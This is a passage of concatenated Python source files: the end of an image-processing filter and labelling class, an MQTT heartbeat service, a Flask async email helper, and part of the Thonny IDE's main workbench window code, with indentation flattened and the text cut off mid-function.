self.binning.append(max(1, i // self.TARGET_SIZE))
else:
for j in range(i // self.TARGET_SIZE - 1, 0, -1):
if i % j == 0:
self.binning.append(max(1, j))
break
else:
self.binning.append(1)
# self.binning = max([max(1, i // self.TARGET_SIZE) for i in self.data.shape])
logger.info("Binning size is %s", self.binning)
self._binned_data = binning(self.cleaned_data, self.binning)
return self._binned_data
def get_median_data(self):
"""
:return: a spatial median filtered image 3x3
"""
if self._median_data is None:
with self._sem_median:
if self._median_data is None:
self._median_data = median_filter(self.cleaned_data, 3)
return self._median_data
def get_blurred_data(self):
"""
:return: a blurred image
"""
if self._blurred_data is None:
with self._sem:
if self._blurred_data is None:
logger.debug("Blurring image with kernel size: %s", self.valley_size)
self._blurred_data = gaussian_filter(self.get_binned_data(),
[self.valley_size / i for i in self.binning],
mode="reflect")
return self._blurred_data
def get_labeled_massif(self, pattern=None, reconstruct=True):
"""
:param pattern: 3x3 matrix
:param reconstruct: if False, split massif at masked position, else reconstruct missing part.
:return: an image composed of int with a different value for each massif
"""
if self._labeled_massif is None:
with self._sem_label:
if self._labeled_massif is None:
if pattern is None:
pattern = numpy.ones((3, 3), dtype=numpy.int8)
logger.debug("Labeling all massifs. This takes some time !!!")
massif_binarization = (self.get_binned_data() > self.get_blurred_data())
if (self.mask is not None) and (not reconstruct):
binned_mask = binning(self.mask.astype(int), self.binning, norm=False)
massif_binarization = numpy.logical_and(massif_binarization, binned_mask == 0)
self._reconstruct_used = reconstruct
labeled_massif, self._number_massif = label(massif_binarization,
pattern)
# TODO: investigate why relabel fails
# relabeled = relabel(labeled_massif, self.get_binned_data(), self.get_blurred_data())
relabeled = labeled_massif
self._labeled_massif = unbinning(relabeled, self.binning, False)
logger.info("Labeling found %s massifs.", self._number_massif)
return self._labeled_massif
@deprecated(reason="switch to pep8 style", replacement="init_valley_size", since_version="0.16.0")
def initValleySize(self):
self.init_valley_size()
@deprecated(reason="switch to PEP8 style", replacement="get_median_data", since_version="0.16.0")
def getMedianData(self):
return self.get_median_data()
@deprecated(reason="switch to PEP8 style", replacement="get_binned_data", since_version="0.16.0")
def getBinnedData(self):
return self.get_binned_data()
@deprecated(reason="switch to PEP8 style", replacement="get_blurred_data", since_version="0.16.0")
def getBluredData(self):
return self.get_blurred_data()
@deprecated(reason="switch to PEP8 style", replacement="get_labeled_massif", since_version="0.16.0")
def getLabeledMassif(self, pattern=None):
return self.get_labeled_massif(pattern)
|
service.py
|
"""[Docstring] Declares functions, running the heartbeat."""
from threading import Thread
from time import sleep
from paho.mqtt.client import Client, MQTTv311
class Service:
"""[Docstring] Static class, holding and managing the microservice's heartbeat thread."""
heartbeatThread: Thread
heartbeatCount: int
@staticmethod
def initiateHeartbeat(interval: float, count: int, brokerAddress: str, brokerPort: int, brokerUsername: str, brokerPassword: str, brokerChannel: str) -> bool:
"""[Docstring] Declares functions, initiating new heartbeat with respective values."""
Service.heartbeatThread = Thread(target=Service.publishHeartbeat, args=(interval, count, brokerAddress, brokerPort, brokerUsername, brokerPassword, brokerChannel, ))
Service.heartbeatThread.daemon = True # works ONLY for generic thread class
Service.heartbeatThread.start()
return Service.heartbeatThread.is_alive()
@staticmethod
def stopHeartbeat() -> bool:
"""[Docstring] Declares functions, stopping currently running heartbeats."""
Service.heartbeatThread.stop()
return not Service.heartbeatThread.is_alive()
@staticmethod
def monitorHeartbeat() -> float:
"""[Docstring] Declares functions, fetching current heartbeat count."""
return Service.heartbeatCount
@staticmethod
def publishHeartbeat(interval: float, count: int, brokerAddress: str, brokerPort: int, brokerUsername: str, brokerPassword: str, brokerChannel: str):
"""[Docstring] Function handling lifetime of a heartbeat."""
try:
Service.heartbeatCount = count
client = Client(client_id="heartbeatPublisher",
clean_session=False,
userdata=None,
protocol=MQTTv311,
transport="tcp")
client.username_pw_set(brokerUsername, brokerPassword)
client.connect(brokerAddress, brokerPort, 60)
while Service.heartbeatCount >= 0:
Service.heartbeatCount += 1
payload: bytes = Service.heartbeatCount.to_bytes(8, "big")
client.publish(brokerChannel, payload=payload, qos=0, retain=False, properties=None)
sleep(interval)
except:
raise Exception("EXPECTATION FAILED")
|
mail.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from app import mail
def _send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(subject = subject, recipients = [to])
msg.html = render_template('mails/' + template, **kwargs)
thr = Thread(target = _send_async_email, args = [app, msg])
thr.start()
return thr
|
workbench.py
|
# -*- coding: utf-8 -*-
import ast
import collections
import importlib
import os.path
import pkgutil
import platform
import queue
import re
import shutil
import socket
import sys
import tkinter as tk
import tkinter.font as tk_font
import traceback
import webbrowser
from logging import getLogger
from threading import Thread
from tkinter import messagebox, ttk
from typing import Any, Callable, Dict, List, Optional, Sequence, Set, Tuple, Type, Union, cast
from warnings import warn
import thonny
from thonny import (
THONNY_USER_DIR,
assistance,
get_runner,
get_shell,
is_portable,
languages,
ui_utils,
)
from thonny.common import Record, UserError, normpath_with_actual_case
from thonny.config import try_load_configuration
from thonny.config_ui import ConfigurationDialog
from thonny.editors import EditorNotebook, is_local_path
from thonny.languages import tr
from thonny.misc_utils import (
copy_to_clipboard,
running_on_linux,
running_on_mac_os,
running_on_rpi,
running_on_windows,
)
from thonny.running import BackendProxy, Runner
from thonny.shell import ShellView
from thonny.ui_utils import (
AutomaticNotebook,
AutomaticPanedWindow,
caps_lock_is_on,
create_action_label,
create_tooltip,
ems_to_pixels,
get_hyperlink_cursor,
get_style_configuration,
lookup_style_option,
register_latin_shortcut,
select_sequence,
sequence_to_accelerator,
shift_is_pressed,
)
logger = getLogger(__name__)
SERVER_SUCCESS = "OK"
SIMPLE_MODE_VIEWS = ["ShellView"]
MenuItem = collections.namedtuple("MenuItem", ["group", "position_in_group", "tester"])
BackendSpec = collections.namedtuple(
"BackendSpec", ["name", "proxy_class", "description", "config_page_constructor", "sort_key"]
)
BasicUiThemeSettings = Dict[str, Dict[str, Union[Dict, Sequence]]]
CompoundUiThemeSettings = List[BasicUiThemeSettings]
UiThemeSettings = Union[BasicUiThemeSettings, CompoundUiThemeSettings]
FlexibleUiThemeSettings = Union[UiThemeSettings, Callable[[], UiThemeSettings]]
SyntaxThemeSettings = Dict[str, Dict[str, Union[str, int, bool]]]
FlexibleSyntaxThemeSettings = Union[SyntaxThemeSettings, Callable[[], SyntaxThemeSettings]]
OBSOLETE_PLUGINS = [
"thonnycontrib.pi",
"thonnycontrib.micropython",
"thonnycontrib.circuitpython",
"thonnycontrib.microbit",
"thonnycontrib.esp",
"thonnycontrib.rpi_pico",
]
class Workbench(tk.Tk):
"""
Thonny's main window and communication hub.
Is responsible for:
* creating the main window
* maintaining layout (_init_containers)
* loading plugins (_init_plugins, add_view, add_command)
* providing references to main components (editor_notebook and runner)
* communication between other components (see event_generate and bind)
* configuration services (get_option, set_option, add_defaults)
* loading translations
* maintaining fonts (named fonts, increasing and decreasing font size)
After workbench and plugins get loaded, 3 kinds of events start happening:
* User events (keypresses, mouse clicks, menu selections, ...)
* Virtual events (mostly via get_workbench().event_generate). These include:
events reported via and dispatched by Tk event system;
WorkbenchEvent-s, reported via and dispatched by enhanced get_workbench().event_generate.
* Events from the background process (program output notifications, input requests,
notifications about debugger's progress)
"""
def __init__(self) -> None:
thonny._workbench = self
self.ready = False
self._closing = False
self._destroyed = False
self._lost_focus = False
self._is_portable = is_portable()
self.initializing = True
self._init_configuration()
self._tweak_environment()
self._check_init_server_loop()
tk.Tk.__init__(self, className="Thonny")
tk.Tk.report_callback_exception = self._on_tk_exception # type: ignore
ui_utils.add_messagebox_parent_checker()
self._event_handlers = {} # type: Dict[str, Set[Callable]]
self._images = (
set()
) # type: Set[tk.PhotoImage] # keep images here to avoid Python garbage collecting them,
self._default_image_mapping = (
{}
) # type: Dict[str, str] # to allow specify default alternative images
self._image_mapping_by_theme = (
{}
) # type: Dict[str, Dict[str, str]] # theme-based alternative images
self._current_theme_name = "clam" # will be overwritten later
self._backends = {} # type: Dict[str, BackendSpec]
self._commands = [] # type: List[Dict[str, Any]]
self._toolbar_buttons = {}
self._view_records = {} # type: Dict[str, Dict[str, Any]]
self.content_inspector_classes = [] # type: List[Type]
self._latin_shortcuts = {} # type: Dict[Tuple[int,int], List[Tuple[Callable, Callable]]]
self._init_language()
self._active_ui_mode = os.environ.get("THONNY_MODE", self.get_option("general.ui_mode"))
self._init_scaling()
self._init_theming()
self._init_window()
self.option_add("*Dialog.msg.wrapLength", "8i")
self.add_view(
ShellView, tr("Shell"), "s", visible_by_default=True, default_position_key="A"
)
assistance.init()
self._runner = Runner()
self._init_hooks() # Plugins may register hooks, so initialized them before to load plugins.
self._load_plugins()
self._editor_notebook = None # type: Optional[EditorNotebook]
self._init_fonts()
self.reload_themes()
self._init_menu()
self._init_containers()
assert self._editor_notebook is not None
self._init_program_arguments_frame()
self._init_regular_mode_link() # TODO:
self._show_views()
# Make sure ShellView is loaded
get_shell()
self._init_commands()
self._init_icon()
try:
self._editor_notebook.load_startup_files()
except Exception:
self.report_exception()
self._editor_notebook.focus_set()
self._try_action(self._open_views)
self.bind_class("EditorCodeViewText", "<<CursorMove>>", self.update_title, True)
self.bind_class("EditorCodeViewText", "<<Modified>>", self.update_title, True)
self.bind_class("EditorCodeViewText", "<<TextChange>>", self.update_title, True)
self.get_editor_notebook().bind("<<NotebookTabChanged>>", self.update_title, True)
self.get_editor_notebook().bind("<<NotebookTabChanged>>", self._update_toolbar, True)
self.bind_all("<KeyPress>", self._on_all_key_presses, True)
self.bind("<FocusOut>", self._on_focus_out, True)
self.bind("<FocusIn>", self._on_focus_in, True)
self.bind("BackendRestart", self._on_backend_restart, True)
self._publish_commands()
self.initializing = False
self.event_generate("<<WorkbenchInitialized>>")
self._make_sanity_checks()
if self._is_server():
self._poll_ipc_requests()
"""
for name in sorted(sys.modules):
if (
not name.startswith("_")
and not name.startswith("thonny")
and not name.startswith("tkinter")
):
print(name)
"""
self.after(1, self._start_runner) # Show UI already before waiting for the backend to start
self.after_idle(self.advertise_ready)
def advertise_ready(self):
self.ready = True
self.event_generate("WorkbenchReady")
self._editor_notebook.update_appearance()
def _make_sanity_checks(self):
home_dir = os.path.expanduser("~")
bad_home_msg = None
if home_dir == "~":
bad_home_msg = "Can not find your home directory."
elif not os.path.exists(home_dir):
bad_home_msg = "Reported home directory (%s) does not exist." % home_dir
if bad_home_msg:
messagebox.showwarning(
"Problems with home directory",
bad_home_msg + "\nThis may cause problems for Thonny.",
master=self,
)
def _try_action(self, action: Callable) -> None:
try:
action()
except Exception:
self.report_exception()
def _init_configuration(self) -> None:
self._configuration_manager = try_load_configuration(thonny.CONFIGURATION_FILE)
self._configuration_pages = [] # type: List[Tuple[str, str, Type[tk.Widget], int]]
self.set_default("general.single_instance", thonny.SINGLE_INSTANCE_DEFAULT)
self.set_default("general.ui_mode", "simple" if running_on_rpi() else "regular")
self.set_default("general.debug_mode", False)
self.set_default("general.disable_notification_sound", False)
self.set_default("general.scaling", "default")
self.set_default("general.language", languages.BASE_LANGUAGE_CODE)
self.set_default("general.font_scaling_mode", "default")
self.set_default("general.environment", [])
self.set_default("general.large_icon_rowheight_threshold", 32)
self.set_default("file.avoid_zenity", False)
self.set_default("run.working_directory", os.path.expanduser("~"))
self.update_debug_mode()
def _tweak_environment(self):
for entry in self.get_option("general.environment"):
if "=" in entry:
key, val = entry.split("=", maxsplit=1)
os.environ[key] = os.path.expandvars(val)
else:
logger.warning("No '=' in environment entry '%s'", entry)
def update_debug_mode(self):
os.environ["THONNY_DEBUG"] = str(self.get_option("general.debug_mode", False))
thonny.set_logging_level()
def _init_language(self) -> None:
"""Initialize language."""
languages.set_language(self.get_option("general.language"))
def _init_window(self) -> None:
self.title("Thonny")
self.set_default("layout.zoomed", False)
self.set_default("layout.top", 50)
self.set_default("layout.left", 150)
if self.in_simple_mode():
self.set_default("layout.width", 1050)
self.set_default("layout.height", 700)
else:
self.set_default("layout.width", 800)
self.set_default("layout.height", 650)
self.set_default("layout.w_width", 200)
self.set_default("layout.e_width", 200)
self.set_default("layout.s_height", 200)
# I don't actually need saved options for Full screen/maximize view,
# but it's easier to create menu items, if I use configuration manager's variables
self.set_default("view.full_screen", False)
self.set_default("view.maximize_view", False)
# In order to avoid confusion set these settings to False
# even if they were True when Thonny was last run
self.set_option("view.full_screen", False)
self.set_option("view.maximize_view", False)
self.geometry(
"{0}x{1}+{2}+{3}".format(
min(max(self.get_option("layout.width"), 320), self.winfo_screenwidth()),
min(max(self.get_option("layout.height"), 240), self.winfo_screenheight()),
min(max(self.get_option("layout.left"), 0), self.winfo_screenwidth() - 200),
min(max(self.get_option("layout.top"), 0), self.winfo_screenheight() - 200),
)
)
if self.get_option("layout.zoomed"):
ui_utils.set_zoomed(self, True)
self.protocol("WM_DELETE_WINDOW", self._on_close)
self.bind("<Configure>", self._on_configure, True)
def _init_icon(self) -> None:
# Window icons
if running_on_linux() and ui_utils.get_tk_version_info() >= (8, 6):
self.iconphoto(True, self.get_image("thonny.png"))
else:
icon_file = os.path.join(self.get_package_dir(), "res", "thonny.ico")
try:
self.iconbitmap(icon_file, default=icon_file)
except Exception:
try:
# seems to work in mac
self.iconbitmap(icon_file)
except Exception:
pass
def _init_menu(self) -> None:
self.option_add("*tearOff", tk.FALSE)
if lookup_style_option("Menubar", "custom", False):
self._menubar = ui_utils.CustomMenubar(
self
) # type: Union[tk.Menu, ui_utils.CustomMenubar]
if self.get_ui_mode() != "simple":
self._menubar.grid(row=0, sticky="nsew")
else:
opts = get_style_configuration("Menubar")
if "custom" in opts:
del opts["custom"]
self._menubar = tk.Menu(self, **opts)
if self.get_ui_mode() != "simple":
self["menu"] = self._menubar
self._menus = {} # type: Dict[str, tk.Menu]
self._menu_item_specs = (
{}
) # type: Dict[Tuple[str, str], MenuItem] # key is pair (menu_name, command_label)
# create standard menus in correct order
self.get_menu("file", tr("File"))
self.get_menu("edit", tr("Edit"))
self.get_menu("view", tr("View"))
self.get_menu("run", tr("Run"))
self.get_menu("tools", tr("Tools"))
self.get_menu("help", tr("Help"))
def _load_plugins(self) -> None:
# built-in plugins
import thonny.plugins # pylint: disable=redefined-outer-name
self._load_plugins_from_path(thonny.plugins.__path__, "thonny.plugins.") # type: ignore
# 3rd party plugins from namespace package
# Now it's time to add plugins dir to sys path
sys.path.append(thonny.get_sys_path_directory_containg_plugins())
try:
import thonnycontrib # @UnresolvedImport
except ImportError:
# No 3rd party plugins installed
pass
else:
self._load_plugins_from_path(thonnycontrib.__path__, "thonnycontrib.")
def _load_plugins_from_path(self, path: List[str], prefix: str) -> None:
load_function_name = "load_plugin"
modules = []
for _, module_name, _ in sorted(pkgutil.iter_modules(path, prefix), key=lambda x: x[2]):
if module_name in OBSOLETE_PLUGINS:
logger.debug("Skipping plug-in %s", module_name)
else:
try:
m = importlib.import_module(module_name)
if hasattr(m, load_function_name):
modules.append(m)
except Exception:
logger.exception("Failed loading plugin '" + module_name + "'")
def module_sort_key(m):
return getattr(m, "load_order_key", m.__name__)
for m in sorted(modules, key=module_sort_key):
getattr(m, load_function_name)()
def _init_fonts(self) -> None:
# set up editor and shell fonts
self.set_default("view.io_font_family", "Courier" if running_on_mac_os() else "Courier New")
default_editor_family = "Courier New"
families = tk_font.families()
for family in ["Consolas", "Ubuntu Mono", "Menlo", "DejaVu Sans Mono"]:
if family in families:
default_editor_family = family
break
self.set_default("view.editor_font_family", default_editor_family)
if running_on_mac_os():
self.set_default("view.editor_font_size", 14)
self.set_default("view.io_font_size", 12)
elif self.in_simple_mode():
self.set_default("view.editor_font_size", 12)
self.set_default("view.io_font_size", 12)
else:
self.set_default("view.editor_font_size", 13)
self.set_default("view.io_font_size", 11)
default_font = tk_font.nametofont("TkDefaultFont")
if running_on_linux():
heading_font = tk_font.nametofont("TkHeadingFont")
heading_font.configure(weight="normal")
caption_font = tk_font.nametofont("TkCaptionFont")
caption_font.configure(weight="normal", size=default_font.cget("size"))
small_link_ratio = 0.8 if running_on_windows() else 0.7
self._fonts = [
tk_font.Font(
name="SmallLinkFont",
family=default_font.cget("family"),
size=int(default_font.cget("size") * small_link_ratio),
underline=True,
),
tk_font.Font(name="IOFont", family=self.get_option("view.io_font_family")),
tk_font.Font(
name="BoldIOFont", family=self.get_option("view.io_font_family"), weight="bold"
),
tk_font.Font(
name="UnderlineIOFont",
family=self.get_option("view.io_font_family"),
underline=True,
),
tk_font.Font(
name="ItalicIOFont", family=self.get_option("view.io_font_family"), slant="italic"
),
tk_font.Font(
name="BoldItalicIOFont",
family=self.get_option("view.io_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(name="EditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(name="SmallEditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(
name="BoldEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
),
tk_font.Font(
name="ItalicEditorFont",
family=self.get_option("view.editor_font_family"),
slant="italic",
),
tk_font.Font(
name="BoldItalicEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(
name="BoldTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
weight="bold",
),
tk_font.Font(
name="ItalicTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
slant="italic",
),
tk_font.Font(
name="UnderlineTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
underline=1,
),
]
self.update_fonts()
def _start_runner(self) -> None:
try:
self.update_idletasks() # allow UI to complete
thonny._runner = self._runner
self._runner.start()
self._update_toolbar()
except Exception:
self.report_exception("Error when initializing backend")
def _check_init_server_loop(self) -> None:
"""Socket will listen requests from newer Thonny instances,
which try to delegate opening files to older instance"""
if not self.get_option("general.single_instance") or os.path.exists(
thonny.get_ipc_file_path()
):
self._ipc_requests = None
return
self._ipc_requests = queue.Queue() # type: queue.Queue[bytes]
server_socket, actual_secret = self._create_server_socket()
server_socket.listen(10)
def server_loop():
while True:
logger.debug("Waiting for next client")
(client_socket, _) = server_socket.accept()
try:
data = bytes()
while True:
new_data = client_socket.recv(1024)
if len(new_data) > 0:
data += new_data
else:
break
proposed_secret, args = ast.literal_eval(data.decode("UTF-8"))
if proposed_secret == actual_secret:
self._ipc_requests.put(args)
# respond OK
client_socket.sendall(SERVER_SUCCESS.encode(encoding="utf-8"))
client_socket.shutdown(socket.SHUT_WR)
logger.debug("AFTER NEW REQUEST %s", client_socket)
else:
client_socket.shutdown(socket.SHUT_WR)
raise PermissionError("Wrong secret")
except Exception as e:
logger.exception("Error in ipc server loop", exc_info=e)
Thread(target=server_loop, daemon=True).start()
def _create_server_socket(self):
if running_on_windows():
server_socket = socket.socket(socket.AF_INET) # @UndefinedVariable
server_socket.bind(("127.0.0.1", 0))
# advertise the port and secret
port = server_socket.getsockname()[1]
import uuid
secret = str(uuid.uuid4())
with open(thonny.get_ipc_file_path(), "w") as fp:
fp.write(str(port) + "\n")
fp.write(secret + "\n")
else:
server_socket = socket.socket(socket.AF_UNIX) # @UndefinedVariable
server_socket.bind(thonny.get_ipc_file_path())
secret = ""
os.chmod(thonny.get_ipc_file_path(), 0o600)
return server_socket, secret
def _init_commands(self) -> None:
self.add_command(
"exit",
"file",
tr("Exit"),
self._on_close,
default_sequence=select_sequence("<Alt-F4>", "<Command-q>", "<Control-q>"),
extra_sequences=["<Alt-F4>"]
if running_on_linux()
else ["<Control-q>"]
if running_on_windows()
else [],
)
self.add_command("show_options", "tools", tr("Options..."), self.show_options, group=180)
self.createcommand("::tk::mac::ShowPreferences", self.show_options)
self.createcommand("::tk::mac::Quit", self._mac_quit)
self.add_command(
"increase_font_size",
"view",
tr("Increase font size"),
lambda: self._change_font_size(1),
default_sequence=select_sequence("<Control-plus>", "<Command-Shift-plus>"),
extra_sequences=["<Control-KP_Add>"],
group=60,
)
self.add_command(
"decrease_font_size",
"view",
tr("Decrease font size"),
lambda: self._change_font_size(-1),
default_sequence=select_sequence("<Control-minus>", "<Command-minus>"),
extra_sequences=["<Control-KP_Subtract>"],
group=60,
)
self.bind("<Control-MouseWheel>", self._cmd_zoom_with_mouse, True)
self.add_command(
"focus_editor",
"view",
tr("Focus editor"),
self._cmd_focus_editor,
default_sequence=select_sequence("<Alt-e>", "<Command-Alt-e>"),
group=70,
)
self.add_command(
"focus_shell",
"view",
tr("Focus shell"),
self._cmd_focus_shell,
default_sequence=select_sequence("<Alt-s>", "<Command-Alt-s>"),
group=70,
)
if self.get_ui_mode() == "expert":
self.add_command(
"toggle_maximize_view",
"view",
tr("Maximize view"),
self._cmd_toggle_maximize_view,
flag_name="view.maximize_view",
default_sequence=None,
group=80,
)
self.bind_class("TNotebook", "<Double-Button-1>", self._maximize_view, True)
self.bind("<Escape>", self._unmaximize_view, True)
self.add_command(
"toggle_maximize_view",
"view",
tr("Full screen"),
self._cmd_toggle_full_screen,
flag_name="view.full_screen",
default_sequence=select_sequence("<F11>", "<Command-Shift-F>"),
group=80,
)
if self.in_simple_mode():
self.add_command(
"font",
"tools",
tr("Change font size"),
caption=tr("Zoom"),
handler=self._toggle_font_size,
image="zoom",
include_in_toolbar=True,
)
self.add_command(
"quit",
"help",
tr("Exit Thonny"),
self._on_close,
image="quit",
caption=tr("Quit"),
include_in_toolbar=True,
group=101,
)
self.add_command(
"SupportUkraine",
"help",
tr("Support Ukraine"),
self._support_ukraine,
image="Ukraine",
caption=tr("Support"),
include_in_toolbar=True,
group=101,
)
if thonny.in_debug_mode():
self.bind_all("<Control-Shift-Alt-D>", self._print_state_for_debugging, True)
def _print_state_for_debugging(self, event) -> None:
print(get_runner()._postponed_commands)
def _init_containers(self) -> None:
margin = 10
# Main frame functions as
# - a background behind padding of main_pw, without this OS X leaves white border
# - a container to be hidden, when a view is maximized and restored when view is back home
main_frame = ttk.Frame(self) #
self._main_frame = main_frame
main_frame.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
self._maximized_view = None # type: Optional[tk.Widget]
self._toolbar = ttk.Frame(main_frame, padding=0)
self._toolbar.grid(column=0, row=0, sticky=tk.NSEW, padx=margin, pady=(5, 0))
self.set_default("layout.west_pw_width", self.scale(150))
self.set_default("layout.east_pw_width", self.scale(150))
self.set_default("layout.s_nb_height", self.scale(150))
self.set_default("layout.nw_nb_height", self.scale(150))
self.set_default("layout.sw_nb_height", self.scale(150))
self.set_default("layout.ne_nb_height", self.scale(150))
self.set_default("layout.se_nb_height", self.scale(150))
self._main_pw = AutomaticPanedWindow(main_frame, orient=tk.HORIZONTAL)
self._main_pw.grid(column=0, row=1, sticky=tk.NSEW, padx=margin, pady=(margin, 0))
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self._west_pw = AutomaticPanedWindow(
self._main_pw,
1,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.west_pw_width"),
)
self._center_pw = AutomaticPanedWindow(self._main_pw, 2, orient=tk.VERTICAL)
self._east_pw = AutomaticPanedWindow(
self._main_pw,
3,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.east_pw_width"),
)
self._view_notebooks = {
"nw": AutomaticNotebook(
self._west_pw, 1, preferred_size_in_pw=self.get_option("layout.nw_nb_height")
),
"w": AutomaticNotebook(self._west_pw, 2),
"sw": AutomaticNotebook(
self._west_pw, 3, preferred_size_in_pw=self.get_option("layout.sw_nb_height")
),
"s": AutomaticNotebook(
self._center_pw, 3, preferred_size_in_pw=self.get_option("layout.s_nb_height")
),
"ne": AutomaticNotebook(
self._east_pw, 1, preferred_size_in_pw=self.get_option("layout.ne_nb_height")
),
"e": AutomaticNotebook(self._east_pw, 2),
"se": AutomaticNotebook(
self._east_pw, 3, preferred_size_in_pw=self.get_option("layout.se_nb_height")
),
}
for nb_name in self._view_notebooks:
self.set_default("layout.notebook_" + nb_name + "_visible_view", None)
self._editor_notebook = EditorNotebook(self._center_pw)
self._editor_notebook.position_key = 1
self._center_pw.insert("auto", self._editor_notebook)
self._statusbar = ttk.Frame(main_frame)
self._statusbar.grid(column=0, row=2, sticky="nsew", padx=margin, pady=(0))
self._statusbar.columnconfigure(2, weight=2)
self._status_label = ttk.Label(self._statusbar, text="")
self._status_label.grid(row=1, column=1, sticky="w")
# self._init_support_ukraine_bar()
self._init_backend_switcher()
def _init_support_ukraine_bar(self) -> None:
ukraine_label = create_action_label(
self._statusbar,
tr("Support Ukraine"),
self._support_ukraine,
# image=self.get_image("Ukraine"),
# compound="left"
)
ukraine_label.grid(row=1, column=1, sticky="wsn")
def _support_ukraine(self, event=None) -> None:
webbrowser.open("https://github.com/thonny/thonny/wiki/Support-Ukraine")
def _init_backend_switcher(self):
# Set up the menu
self._backend_conf_variable = tk.StringVar(value="{}")
if running_on_mac_os():
menu_conf = {}
else:
menu_conf = get_style_configuration("Menu")
self._backend_menu = tk.Menu(self._statusbar, tearoff=False, **menu_conf)
# Set up the button
self._backend_button = ttk.Button(self._statusbar, text="☰", style="Toolbutton")
self._backend_button.grid(row=1, column=3, sticky="nes")
self._backend_button.configure(command=self._post_backend_menu)
def _post_backend_menu(self):
menu_font = tk_font.nametofont("TkMenuFont")
def choose_backend():
backend_conf = ast.literal_eval(self._backend_conf_variable.get())
assert isinstance(backend_conf, dict), "backend conf is %r" % backend_conf
for name, value in backend_conf.items():
self.set_option(name, value)
get_runner().restart_backend(False)
self._backend_menu.delete(0, "end")
max_description_width = 0
button_text_width = menu_font.measure(self._backend_button.cget("text"))
num_entries = 0
added_micropython_separator = False
for backend in sorted(self.get_backends().values(), key=lambda x: x.sort_key):
entries = backend.proxy_class.get_switcher_entries()
for conf, label in entries:
if not added_micropython_separator and "MicroPython" in label:
self._backend_menu.add_separator()
added_micropython_separator = True
self._backend_menu.add_radiobutton(
label=label,
command=choose_backend,
variable=self._backend_conf_variable,
value=repr(conf),
)
max_description_width = max(menu_font.measure(label), max_description_width)
num_entries += 1
# self._backend_conf_variable.set(value=self.get_option("run.backend_name"))
self._backend_menu.add_separator()
self._backend_menu.add_command(
label=tr("Configure interpreter..."),
command=lambda: self.show_options("interpreter"),
)
post_x = self._backend_button.winfo_rootx()
post_y = (
self._backend_button.winfo_rooty()
- self._backend_menu.yposition("end")
- self._backend_menu.yposition(1)
)
if self.winfo_screenwidth() / self.winfo_screenheight() > 2:
# Most likely several monitors.
# Tk will adjust x properly with single monitor, but when Thonny is maximized
# on a monitor, which has another monitor to its right, the menu can be partially
# displayed on another monitor (at least in Ubuntu).
width_diff = max_description_width - button_text_width
post_x -= width_diff + menu_font.measure("mmm")
try:
self._backend_menu.tk_popup(post_x, post_y)
except tk.TclError as e:
if not 'unknown option "-state"' in str(e):
logger.warning("Problem with switcher popup", exc_info=e)
def _on_backend_restart(self, event):
proxy = get_runner().get_backend_proxy()
if proxy:
conf = proxy.get_current_switcher_configuration()
desc = proxy.get_switcher_configuration_label(conf)
value = repr(conf)
else:
desc = "<no backend>"
value = "n/a"
self._backend_conf_variable.set(value=value)
self._backend_button.configure(text=desc + " ☰")
def _init_theming(self) -> None:
self._style = ttk.Style()
self._ui_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleUiThemeSettings, Dict[str, str]]] # value is (parent, settings, images)
self._syntax_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleSyntaxThemeSettings]] # value is (parent, settings)
self.set_default("view.ui_theme", self.get_default_ui_theme())
def add_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]] = None,
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences=False,
) -> None:
"""Registers an item to be shown in specified menu.
Args:
menu_name: Name of the menu the command should appear in.
Standard menu names are "file", "edit", "run", "view", "help".
If a menu with given name doesn't exist, then new menu is created
(with label=name).
command_label: Label for this command
handler: Function to be called when the command is invoked.
Should be callable with one argument (the event or None).
tester: Function to be called for determining if command is available or not.
Should be callable with one argument (the event or None).
Should return True or False.
If None then command is assumed to be always available.
default_sequence: Default shortcut (Tk style)
flag_name: Used for toggle commands. Indicates the name of the boolean option.
group: Used for grouping related commands together. Value should be int.
Groups with smaller numbers appear before.
Returns:
None
"""
# Temporary solution for plug-ins made for versions before 3.2
if menu_name == "device":
menu_name = "tools"
group = 150
# store command to be published later
self._commands.append(
dict(
command_id=command_id,
menu_name=menu_name,
command_label=command_label,
handler=handler,
tester=tester,
default_sequence=default_sequence,
extra_sequences=extra_sequences,
flag_name=flag_name,
skip_sequence_binding=skip_sequence_binding,
accelerator=accelerator,
group=group,
position_in_group=position_in_group,
image=image,
caption=caption,
alternative_caption=alternative_caption,
include_in_menu=include_in_menu,
include_in_toolbar=include_in_toolbar,
submenu=submenu,
bell_when_denied=bell_when_denied,
show_extra_sequences=show_extra_sequences,
)
)
def _publish_commands(self) -> None:
for cmd in self._commands:
self._publish_command(**cmd)
def _publish_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]],
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
